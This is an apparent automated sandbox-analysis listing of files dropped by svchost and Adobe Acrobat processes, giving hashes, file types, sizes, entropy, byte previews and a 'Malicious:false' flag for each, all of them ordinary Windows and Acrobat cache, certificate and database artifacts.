                                                              SHA-512:2640A6B47E6F29F22D62F0B355BAE7B62D183A1F9970096CB5A68BD35CCDC2FDC17531FC8FF271E5350D170E25BEA7FCC416C3C3C65BC240D05C1440EDD56043
                                                              Malicious:false
                                                              Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb1919ad2, page size 16384, DirtyShutdown, Windows version 10.0
                                                              Category:dropped
                                                              Size (bytes):1310720
                                                              Entropy (8bit):0.7217505855288701
                                                              Encrypted:false
                                                              SSDEEP:1536:zSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:zazaNvFv8V2UW/DLzN/w4wZi
                                                              MD5:787CA1F04CC9B5118452429AB6ED1E32
                                                              SHA1:3B698DE7D2B34094D23B18A40B51CB8FB7AEC7B7
                                                              SHA-256:BC93F98D90C4BFB34C4B6055AE67D138CD31A2DEEEB6A7FF646CC037F9EAE926
                                                              SHA-512:BAEF2CC3805873F72B3371E9D5597C68046DC62CF8F6D28DDC959CD82BDD323AFE4A293237B9D0E91367C7AFA8B03DE6D4F457BA3F7B254EF439812AE12FEB87
                                                              Malicious:false
                                                              Preview:....... ...............X\...;...{......................p.D..........{}.$....|}.h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{...................................mw.$....|...................$.+$....|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.08055358206209384
                                                              Encrypted:false
                                                              SSDEEP:3:cP/8Ye2fVG7gr/fgsCrZClW/tOwVG+ll+SHY/Xl+/rQLve:sUzKU7Kfgs3GowVGaAS4M
                                                              MD5:9763D55EB9A4D9353A7A0614020BBB70
                                                              SHA1:B9B14A21B456A6C5D30EBCF7A581BBDA9AF90133
                                                              SHA-256:2E4CD12ACB193EEB3DAF866003C68DD0D963CE2339516460DE200E6EE7FBD20B
                                                              SHA-512:B6F28620A21BC0A55FC66D98D99C953287AB7F447E880DBDE895176002AFC19680EE19A60F9AFA9EABD702859D56E74509400F0EDF9F87B8D2668B93EA3C6738
                                                              Malicious:false
                                                              Preview:..a.....................................;...{..$....|.......{}..............{}......{}.vv_Q.....{}..................$.+$....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):290
                                                              Entropy (8bit):5.250804707081586
                                                              Encrypted:false
                                                              SSDEEP:6:FUCSQL+q2PqLTwi2nKuAl9OmbnIFUt8c4G1Zmw+c4QLVkwOqLTwi2nKuAl9Ombjd:FUCSVv8wZHAahFUt8c4G1/+c4I5TwZHi
                                                              MD5:73A890337944C9A72612F19450D3B9EE
                                                              SHA1:346F5C768350CE601D4D797093B88F0882DFFE27
                                                              SHA-256:02460E0BF1D4CFF58601A943E65A6530EF9BEB139B8850E5F401FE1DC473A986
                                                              SHA-512:2F5C2F431280303C8A2249C794B9DEB42508A18CE52755EDE99D682DBFAF9A63B41016EB9125D7CDE0C31C5C88E97F8B7E723372834E4A1C48C23B0E8CB82783
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.367 1fc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:46:36.370 1fc8 Recovering log #3.2024/12/06-09:46:36.370 1fc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):290
                                                              Entropy (8bit):5.250804707081586
                                                              Encrypted:false
                                                              SSDEEP:6:FUCSQL+q2PqLTwi2nKuAl9OmbnIFUt8c4G1Zmw+c4QLVkwOqLTwi2nKuAl9Ombjd:FUCSVv8wZHAahFUt8c4G1/+c4I5TwZHi
                                                              MD5:73A890337944C9A72612F19450D3B9EE
                                                              SHA1:346F5C768350CE601D4D797093B88F0882DFFE27
                                                              SHA-256:02460E0BF1D4CFF58601A943E65A6530EF9BEB139B8850E5F401FE1DC473A986
                                                              SHA-512:2F5C2F431280303C8A2249C794B9DEB42508A18CE52755EDE99D682DBFAF9A63B41016EB9125D7CDE0C31C5C88E97F8B7E723372834E4A1C48C23B0E8CB82783
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.367 1fc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:46:36.370 1fc8 Recovering log #3.2024/12/06-09:46:36.370 1fc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):334
                                                              Entropy (8bit):5.182546527478554
                                                              Encrypted:false
                                                              SSDEEP:6:FbU3+q2PqLTwi2nKuAl9Ombzo2jMGIFUt8cVVdXZmw+cVVd3VkwOqLTwi2nKuAlx:Fpv8wZHAa8uFUt8cVX/+cVF5TwZHAa8z
                                                              MD5:DD4DD37DCE2B5AED3AD7092946A884AD
                                                              SHA1:E4B2AD61E62C155CC3111F87A8C76D1A3A0E9875
                                                              SHA-256:2836AD383B5655266A8C53C31A9C146453EE8B141B432B572EE996B660E624D2
                                                              SHA-512:3DD863B0CD2BD04B6D2BF1B9F386F47C65EF6BCFCAACD2A97E05B64DE1A93781652FE87B2D4165D2A803F1F971C0CBDC9DB265F59738F9114248581599BF518F
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.428 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:46:36.430 1608 Recovering log #3.2024/12/06-09:46:36.430 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):334
                                                              Entropy (8bit):5.182546527478554
                                                              Encrypted:false
                                                              SSDEEP:6:FbU3+q2PqLTwi2nKuAl9Ombzo2jMGIFUt8cVVdXZmw+cVVd3VkwOqLTwi2nKuAlx:Fpv8wZHAa8uFUt8cVX/+cVF5TwZHAa8z
                                                              MD5:DD4DD37DCE2B5AED3AD7092946A884AD
                                                              SHA1:E4B2AD61E62C155CC3111F87A8C76D1A3A0E9875
                                                              SHA-256:2836AD383B5655266A8C53C31A9C146453EE8B141B432B572EE996B660E624D2
                                                              SHA-512:3DD863B0CD2BD04B6D2BF1B9F386F47C65EF6BCFCAACD2A97E05B64DE1A93781652FE87B2D4165D2A803F1F971C0CBDC9DB265F59738F9114248581599BF518F
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.428 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:46:36.430 1608 Recovering log #3.2024/12/06-09:46:36.430 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:modified
                                                              Size (bytes):475
                                                              Entropy (8bit):4.975057483198527
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqeLsBdOg2HNAcaq3QYiub5P7E4TX:Y2sRdsfsdMHNr3QYhbt7n7
                                                              MD5:EE1817416A3B4E5E964BAB82FA64273E
                                                              SHA1:D796DBD31BD8A021330DBBA93C2F87E9E79AB947
                                                              SHA-256:F5B07AB55B48A211DB28AE5B65761F396DDF017D16AF0EB023634EB253E11542
                                                              SHA-512:B0756B79D22105E628DFCCDFF87321D53DA58A97DCE992C70AFE616CB25907319E559E7675683560849274BA4397A7423078989CC8089CD27AE829DF9DAADD7B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378056404473799","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":629777},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.96165270016851
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                              MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                              SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                              SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                              SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.96165270016851
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                              MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                              SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                              SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                              SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.96165270016851
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                              MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                              SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                              SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                              SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):3878
                                                              Entropy (8bit):5.22378385521005
                                                              Encrypted:false
                                                              SSDEEP:96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzpN+HzwQrs:1CDLCmPj8j0/8qKgwPHYPx8xemT8OzpP
                                                              MD5:ECEFB335E1EF6921BED657B68EB550CE
                                                              SHA1:0E1013E0E44EA85F56998D5E1F621EFACCF01494
                                                              SHA-256:7F5E3D60F833903A4BD8130EE60D156BAF15E32BF2F0649D5AD2B05B8C95E606
                                                              SHA-512:4805573F4B05D7ABD32027C0B55EFA5FDCE78CAA6788A7C8EC5AB5875AF968C8C1F639D726EBB98222427DDBF4A1836C918AE098651B3D5C7352AFED8A7A0086
                                                              Malicious:false
                                                              Preview:*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):322
                                                              Entropy (8bit):5.196492275018618
                                                              Encrypted:false
                                                              SSDEEP:6:Fqz+q2PqLTwi2nKuAl9OmbzNMxIFUt8cXk5Zmw+coVkwOqLTwi2nKuAl9OmbzNMT:FqKv8wZHAa8jFUt8cXk5/+cA5TwZHAab
                                                              MD5:B0A59F34F119DF5954D7696B96667A69
                                                              SHA1:D3E29DE9310299BE7B992B7F396EE1C779C4C9AE
                                                              SHA-256:A266D150B9B959E42AB81CF2810492A180AB7C76C6F396333977AA457666AC3D
                                                              SHA-512:09A454A4522197271E4C6FE002B16D6F9549332CB5D46D3E46F6D855CB8EC5CBE14AE8C23AB32362FA6E3E6470B7D1C7EC1DC697CE97BF31580D3880639BB857
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.806 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:46:36.815 1608 Recovering log #3.2024/12/06-09:46:36.820 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):322
                                                              Entropy (8bit):5.196492275018618
                                                              Encrypted:false
                                                              SSDEEP:6:Fqz+q2PqLTwi2nKuAl9OmbzNMxIFUt8cXk5Zmw+coVkwOqLTwi2nKuAl9OmbzNMT:FqKv8wZHAa8jFUt8cXk5/+cA5TwZHAab
                                                              MD5:B0A59F34F119DF5954D7696B96667A69
                                                              SHA1:D3E29DE9310299BE7B992B7F396EE1C779C4C9AE
                                                              SHA-256:A266D150B9B959E42AB81CF2810492A180AB7C76C6F396333977AA457666AC3D
                                                              SHA-512:09A454A4522197271E4C6FE002B16D6F9549332CB5D46D3E46F6D855CB8EC5CBE14AE8C23AB32362FA6E3E6470B7D1C7EC1DC697CE97BF31580D3880639BB857
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.806 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:46:36.815 1608 Recovering log #3.2024/12/06-09:46:36.820 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                              Category:dropped
                                                              Size (bytes):86016
                                                              Entropy (8bit):4.4388384957695095
                                                              Encrypted:false
                                                              SSDEEP:384:ye+ci5GliBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:ppurVgazUpUTTGt
                                                              MD5:B615281E9A3DD4744EBE361CA962DA0C
                                                              SHA1:2788969B03BE87389993F84D04F1548CCC1B7986
                                                              SHA-256:B43955DB8557870917E32646752CB1E1C283A91DBB18A784C6FDCDB7FE82585E
                                                              SHA-512:39B6BFAF23CB2E1F98A8A154D6BA160425F657D3EA9CED956B46486E1CC346DB7030B6D6E5F3A72798D5C3F75E1CE80FC39A3E2A9679262EBE10588FE6C021AE
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite Rollback Journal
                                                              Category:dropped
                                                              Size (bytes):8720
                                                              Entropy (8bit):3.7686253958687925
                                                              Encrypted:false
                                                              SSDEEP:48:7MssJioyVPioyHoy1C7oy16oy1FKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1X:7gJuPVcXjBiSb9IVXEBodRBkA
                                                              MD5:B3A2639C45CDC20D24124DC00C726321
                                                              SHA1:11424CC92B697419CDF1821723837026E7157A2D
                                                              SHA-256:E21EF6BF78114497CC7C689CE48D4FDC12D41453D9B9A1D220C10BE1D76E6086
                                                              SHA-512:E9F58DAF8FAD0BDC65785E15E07AC097D26C7BC0E2CF1215D58334D7325A698B67D20C5F4072580A77BDC05F0000449A8B6EF64A77905111E97C32783AAE2C6E
                                                              Malicious:false
                                                              Preview:.... .c......p.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:Certificate, Version=3
                                                              Category:dropped
                                                              Size (bytes):1391
                                                              Entropy (8bit):7.705940075877404
                                                              Encrypted:false
                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                              Malicious:false
                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                              Category:dropped
                                                              Size (bytes):71954
                                                              Entropy (8bit):7.996617769952133
                                                              Encrypted:true
                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                              Malicious:false
                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):192
                                                              Entropy (8bit):2.770710652184824
                                                              Encrypted:false
                                                              SSDEEP:3:kkFklPsXPvfllXlE/HT8k+TulXNNX8RolJuRdxLlGB9lQRYwpDdt:kKrXIT8eNMa8RdWBwRd
                                                              MD5:3DEFA99F8209842B0EBAF248F5711842
                                                              SHA1:28F423E8B61CACC7677F5171BF3DE69D6551D6EF
                                                              SHA-256:302526A73CA2A89ED8147DAE43A3D320BE124C3D2F7ABDE4A5E0DB4E2173B914
                                                              SHA-512:263B0B40131B49935B0986F768AD05BADF8C1D35D73231839FE6912BF5556C9E498CA1AD78F9001FB8D4BF915BF1B5D084610D02BC6DFA9CC401B7C174162041
                                                              Malicious:false
                                                              Preview:p...... .........I...G..(....................................................... ..........W....[6..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):328
                                                              Entropy (8bit):3.2394988199912085
                                                              Encrypted:false
                                                              SSDEEP:6:kKFebNF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:wqDImsLNkPlE99SNxAhUe/3
                                                              MD5:1996DB69E7FF64F4EE96797FDB694EDE
                                                              SHA1:A00CB8A126CD1AA96B0967BDC6EBCFA96705CB6D
                                                              SHA-256:D8C9D04B36A8236D46D7F1A3371A43BC8204F603B2624394ADE4B4CAC2818DBF
                                                              SHA-512:ED58F40B35B5953F5BC369F286950C7AF786A205F764EBB4BBD4E7687E2193E66142F2FC91D2F498AF6ACF2DD240FC745C4C7246F3F98988056A1B4C9F1D70F5
                                                              Malicious:false
                                                              Preview:p...... ........1...G..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PostScript document text
                                                              Category:dropped
                                                              Size (bytes):1233
                                                              Entropy (8bit):5.233980037532449
                                                              Encrypted:false
                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                              Malicious:false
                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PostScript document text
                                                              Category:dropped
                                                              Size (bytes):1233
                                                              Entropy (8bit):5.233980037532449
                                                              Encrypted:false
                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
